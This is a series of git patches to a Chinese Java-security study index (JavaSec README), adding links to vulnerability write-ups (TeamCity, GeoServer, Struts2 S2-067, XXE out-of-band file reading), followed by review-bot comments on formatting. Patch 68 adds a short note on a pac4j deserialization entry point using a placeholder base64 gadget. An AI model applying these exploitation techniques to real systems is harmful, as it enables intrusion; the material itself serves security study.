知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中 +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From 8c852d3d3ec48f0c9ed1780e642ae06aaaea9efe Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:50:49 +0800 Subject: [PATCH 58/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 02116fe..d4a9c57 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From f3b15d59e30df63d49e821ec43a6a08d4497a179 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:51:09 +0800 Subject: [PATCH 59/72] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index d4a9c57..9a6cb9d 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,8 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 From f098935f640e4a17e990251a36b24de246ce8009 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 28 May 2024 09:46:47 +0800 Subject: [PATCH 60/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9a6cb9d..144eaba 100644 --- a/README.md +++ b/README.md @@ -394,6 +394,7 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) + - [JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识)](https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) From 84effdd5d719474892ef06843e5f4a55d0f162ed Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 5 Jun 2024 09:41:53 +0800 Subject: [PATCH 61/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新反序列化toString链 --- README.md | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 144eaba..137c87d 100644 --- a/README.md +++ b/README.md @@ -14,14 +14,6 @@

2021年10月18日,梦的开始

-
-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) - -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 - - - - ## 1.基础篇 - [Java反射](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E5%8F%8D%E5%B0%84/%E5%8F%8D%E5%B0%84.md) @@ -483,6 +475,7 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) - [任意文件下载漏洞的利用思考(总结非常细!)](https://mp.weixin.qq.com/s/3y62xuQJAj2gmtBSKvHHug) +- [jdk新入口挖掘(新的toString链)](https://xz.aliyun.com/t/14732) ## 比赛反思 @@ -534,6 +527,17 @@ Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分 - [回忆飘如雪](https://gv7.me/) +## 知识星球 + +
+知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 + + + + + ## 更多 From 831661aa8e4566e88e1ffb181b053c1762419eed Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 18 Jun 2024 22:50:10 +0800 Subject: [PATCH 62/72] Update README.md Update Smartbi --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 137c87d..9787a60 100644 --- a/README.md +++ b/README.md @@ -374,6 +374,8 @@ - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) + - [浅析Smartbi逻辑漏洞(2)](https://y4tacker.github.io/2023/08/23/year/2023/8/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E-2/) + - [浅析Smartbi逻辑漏洞(3)](https://y4tacker.github.io/2024/04/19/year/2024/4/%E6%B5%85%E6%9E%90SmartBi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E-3/) - CrushFTP - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [浅析CrushFTP之VFS逃逸](https://y4tacker.github.io/2024/04/23/year/2024/4/%E6%B5%85%E6%9E%90CrushFTP%E4%B9%8BVFS%E9%80%83%E9%80%B8/) From 4fbd70bc0d7913f89b1df5c8a017624c5abb0255 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 18 Jun 2024 22:55:40 +0800 Subject: [PATCH 63/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Update XML 相关漏洞风险研究 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9787a60..930bf21 100644 --- a/README.md +++ b/README.md 
@@ -36,6 +36,7 @@ - [JSTL(看菜鸟教程即可)](https://www.runoob.com/jsp/jsp-jstl.html) - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) + - [XML 相关漏洞风险研究(关于XML结构方面的介绍可以看看这篇文章,浅显易懂)](https://evilpan.com/2024/06/02/xml-vulnerabilities/) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) From 85587e55ca31b840cd167921b5a7c82c076b79f1 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 23 Jul 2024 17:21:21 +0800 Subject: [PATCH 64/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 930bf21..8bd311b 100644 --- a/README.md +++ b/README.md 
@@ -387,6 +387,7 @@ - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) + - [浅析GeoServer property 表达式注入代码执行(CVE-2024-36401)](https://y4tacker.github.io/2024/07/03/year/2024/7/%E6%B5%85%E6%9E%90GeoServer-property-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-CVE-2024-36401/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [JetBrains TeamCity权限绕过(CVE-2024-23917)(这篇文章还讲解了一些容器与SpringBoot的流程知识)](https://blog.0daylabs.com/2024/05/27/jetbrains-teamcity-auth-bypass/) From a103573551ae31ca3534743c1c53251842571edf Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 26 Jul 2024 10:35:54 +0800 Subject: [PATCH 65/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新浅谈JFinal的DenyAccessJsp绕过 --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 8bd311b..fbf763b 100644 --- a/README.md +++ b/README.md 
@@ -429,9 +429,8 @@ - [Tomcat URL解析差异性导致的安全问题(网上看到的主要关注HttpServletRequest中几个解析URL的函数这个问题)](https://xz.aliyun.com/t/7544) - [Tomcat中url解析特性](https://github.com/Y4tacker/JavaSec/blob/main/8.%E5%85%B3%E4%BA%8ETomcat%E7%9A%84%E4%B8%80%E4%BA%9B%E5%88%86%E4%BA%AB/Tomcat%E4%B8%ADurl%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7/index.md) - [SpringBoot2.3.0以下路由%2e跨目录处理(可用于权限绕过)](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot2.3.0%E4%BB%A5%E4%B8%8B%E8%B7%AF%E7%94%B1%252e%E8%B7%A8%E7%9B%AE%E5%BD%95%E5%A4%84%E7%90%86(%E5%8F%AF%E7%94%A8%E4%BA%8E%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87)/index.md) - - [网上看到的Jetty的部分解析特性(支持%uxxx)](https://www.wangan.com/p/7fyg8k2c7781675a) - +- [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) ## 19.ASM与JVM学习 From 8995ac4bb87bcc9a89311d926d68e50628e78650 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 26 Jul 2024 10:36:40 +0800 Subject: [PATCH 66/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fbf763b..d2408e9 100644 --- a/README.md +++ b/README.md @@ -535,7 +535,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢 +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢(当然大0day不会发) From cf52fcfeea524938b9c6ec1568407342a7af58a6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 4 Sep 2024 10:30:46 +0800 Subject: [PATCH 67/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d2408e9..7623b4f 100644 --- a/README.md +++ b/README.md @@ -50,6 +50,7 @@ 如果想系统学习CC链、CB链的话这部分还是推荐p牛的[Java安全漫谈](https://github.com/phith0n/JavaThings),我只是简单写写便于自己复习而已(这部分看我下面的share并不适合新人,过了这么久看过网上很多文章还是觉得P牛写的更适合新人) +- [Java 反序列化取经路(强推)](https://su18.org/post/ysuserial/) - [Java反序列化之URLDNS](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BURLDNS/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BURLDNS.md) - [CommonsCollections1笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections1/CommonsCollections1.md) - [CommonsCollections2笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections2/CommonsCollections2.md) From 8140d9ea62bdb4efb6553bab75ff7a9527166dfe Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 11 Oct 2024 15:51:04 +0800 Subject: [PATCH 68/72] =?UTF-8?q?Update=20Java=E8=A7=A6=E5=8F=91=E4=BA=8C?= =?UTF-8?q?=E6=AC=A1=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E7=82=B9?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新二次反序列化利用点 --- ...2\217\345\210\227\345\214\226\347\232\204\347\202\271.md" | 5 +++++ 1 file changed, 5 insertions(+) 
diff --git "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" index 9767f82..97fb857 100644 --- "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" +++ "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" @@ -313,3 +313,8 @@ public class DemoTest { ``` 具体分析见https://y4tacker.github.io/2022/02/06/year/2022/2/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget%E7%9A%84%E5%AD%A6%E4%B9%A0/#hex%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E8%8A%82%E5%8A%A0%E8%BD%BD%E5%99%A8 + + +## org.pac4j.core.profile.InternalAttributeHandler#restore +使用{#sb64}rO0ABXN...serizalized_object_in_base64...,隐藏TemplatesImpl,可惜不是通用的 +参考链接:https://securitylab.github.com/advisories/GHSL-2022-085_pac4j/ From 99bb136c0f4e758126778538588819ed199e8b1b Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 11 Oct 2024 15:57:31 +0800 Subject: [PATCH 69/72] =?UTF-8?q?Update=20Java=E8=A7=A6=E5=8F=91=E4=BA=8C?= =?UTF-8?q?=E6=AC=A1=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E7=82=B9?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" index 97fb857..3ac9afe 100644 --- "a/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" +++ "b/\345\205\266\344\273\226/Java\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226/Java\350\247\246\345\217\221\344\272\214\346\254\241\345\217\215\345\272\217\345\210\227\345\214\226\347\232\204\347\202\271.md" @@ -317,4 +317,5 @@ public class DemoTest { ## org.pac4j.core.profile.InternalAttributeHandler#restore 使用{#sb64}rO0ABXN...serizalized_object_in_base64...,隐藏TemplatesImpl,可惜不是通用的 +另外很可惜的是高版本还做了删除,具体可以看公告:https://github.com/pac4j/pac4j/blob/1c198f3fbadc4e8c94bc953327e4e2a38c888525/documentation/blog/what_s_new_in_pac4j_v4_1.md?plain=1#L16 参考链接:https://securitylab.github.com/advisories/GHSL-2022-085_pac4j/ From b082f562c7655af991bf7cb78f87b743a5552ec6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 16 Dec 2024 23:10:40 +0800 Subject: [PATCH 70/72] Update README.md Update CVE-2024-53677(S2-067) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7623b4f..a71ee0c 100644 --- a/README.md +++ b/README.md 
@@ -225,7 +225,7 @@ - [S2-045学习(通过container获取全局共享的OgnlUtil实例来清除SecurityMemberAccess当中属性的限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-045%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-057学习(突破#context被删除限制,从attr作用域获取context对象)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-057%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-066学习(变量覆盖的有趣的例子)](https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/) - +- [S2-067学习](https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/) ## 8.关于Tomcat的一些小研究 From f8b923bacf07d188d99ae7d94943fdab3f1d9c47 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 5 Jan 2025 18:42:49 +0800 Subject: [PATCH 71/72] Update README.md --- README.md | 8 -------- 1 file changed, 8 deletions(-) diff --git a/README.md b/README.md index a71ee0c..87f4e22 100644 --- a/README.md +++ b/README.md @@ -531,14 +531,6 @@ - [回忆飘如雪](https://gv7.me/) -## 知识星球 - -
-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) - -Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中,谁让我喜欢为爱发电呢(当然大0day不会发) - - From a6e0f8cc3a63622b768c3b46297c66dc8a0a85f0 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 10 Nov 2025 19:47:01 +0800 Subject: [PATCH 72/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add No-FTP:高版本JDK如何通过XXE-OOB读取多行文件(WIndows) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 87f4e22..7b814d6 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) - [XML 相关漏洞风险研究(关于XML结构方面的介绍可以看看这篇文章,浅显易懂)](https://evilpan.com/2024/06/02/xml-vulnerabilities/) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) + - [No-FTP:高版本JDK如何通过XXE-OOB读取多行文件(Windows)](https://y4tacker.github.io/2025/11/10/year/2025/11/No-FTP-%E9%AB%98%E7%89%88%E6%9C%ACJDK%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87XXE-OOB%E8%AF%BB%E5%8F%96%E5%A4%9A%E8%A1%8C%E6%96%87%E4%BB%B6/) - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md)
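Review bot: In PATCH 67/72 (README.md, @@ -50,6 +50,7 @@) the new first entry is marked "强推" (strongly recommended), but the context paragraph directly above still tells readers that P牛's Java安全漫谈 is the recommended systematic introduction and that the list below is not suited to newcomers. Say in that paragraph how the two recommendations relate, or move the new link into it. The entry is also written "Java 反序列化取经路" with a space, while the context entry below it uses "Java反序列化之URLDNS" without one.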
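Review bot: In PATCH 68/72 (@@ -313,3 +313,8 @@) the placeholder in the new pac4j section is misspelled "serizalized_object_in_base64"; it should read "serialized_object_in_base64". The value line and the "参考链接:" line are added back to back with no blank line between them, so Markdown will join them into one paragraph; separate them and mark the "{#sb64}rO0ABXN..." value as code so the braces and "#" render literally. The note also says the technique is "不是通用的" (not universal) without naming the condition that limits it; one clause stating that condition would let a reader judge whether their own pac4j deployment is exposed.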
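Review bot: In PATCH 69/72 (@@ -317,4 +317,5 @@) the added sentence says only that "高版本" (newer versions) removed the feature, while the linked file name, what_s_new_in_pac4j_v4_1.md, points at a specific release. State the version boundary in the text itself so the note is still usable if the link goes stale. The new line is also inserted between two other lines with no blank lines around it, so all three will render as a single paragraph.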
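Review bot: In PATCH 70/72 (README.md, @@ -225,7 +225,7 @@) the new entry is labelled only "S2-067学习", while every context entry above it carries a parenthetical summary of the technique (for example "S2-066学习(变量覆盖的有趣的例子)"). The CVE id appears in the commit subject and in the URL slug (文件上传逻辑绕过, CVE-2024-53677) but not in the visible link text; add both there so the list can be searched by CVE and by bug class.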